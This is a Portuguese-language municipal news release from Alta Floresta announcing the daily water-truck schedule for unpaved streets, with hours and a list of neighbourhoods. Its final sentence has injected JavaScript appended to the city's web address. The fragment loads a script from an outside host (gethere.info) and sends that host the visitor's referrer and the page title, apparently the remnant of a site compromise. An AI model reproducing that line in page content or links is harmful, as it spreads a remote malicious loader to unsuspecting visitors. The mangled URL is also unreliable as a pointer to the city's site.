Capa / Em Destaque / Prefeitura de Alta Floresta divulga cronograma dos caminhões pipas

Prefeitura de Alta Floresta divulga cronograma dos caminhões pipas

Lindomar Leal
Assessoria da PMAF

A Prefeitura de Alta Floresta divulgou nesta terça-feira, 14, o cronograma dos caminhões pipas que irão molhar as ruas e avenidas não pavimentadas dos bairros e setores do perímetro urbano.

Definido pela Secretaria Municipal de Infraestrutura, o cronograma está em execução desde a última segunda-feira, 13. Nele contem trinta e cinco bairros e setores, desde o Jardim Panorama, na entrada da cidade, até a Vila Rural. Dos oito caminhões licitados seis irão permanecer na cidade e dois serão destinados para auxiliar o trabalho de recuperação das estradas vicinais na zona rural.PREFEITURA

O secretário de Infraestrutura, Eloi Luiz de Almeida, designou um funcionário para coordenar os serviços e fiscalizar a execução do cronograma. As vias não pavimentadas serão molhadas duas vezes por dia, de domingo a domingo – das 05:00 às 09:00 horas e das 16:00 às 20:00 horas.

Confira os bairros e setores que estão contemplados no cronograma: Residencial Universitário, Residencial das Mangueiras, Tropical, Oiti, São José Operário, Santa Maria, Portal do Sol, E/G, Perimetral Teles Pires – Lar dos Idosos, Coração Missionário e Perimetral do Rotary, Jardim das Oliveiras, Jardim Panorama, Jardim Renascer, Jardim Primavera, Cidade Bela, Vila Rica, Setor do Bento, Jardim Imperial, Boa Esperança, Guaraná 1, Vila Rural, Jardim Guará 2, Jardim das Flores, Norte 3, Chapéu de Couro, Setor da Madeseik, Avenida das Orquídeas, Sol Nascente, Flamboyant (UNEMAT), Boa Nova 1, 2 e 3, B-03 e H-13.

O cronograma também está disponível na página da Prefeitura e da Secretaria Municipal de Infraestrutura no facebook, e no site www.altafloresta.mt.gov.brs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top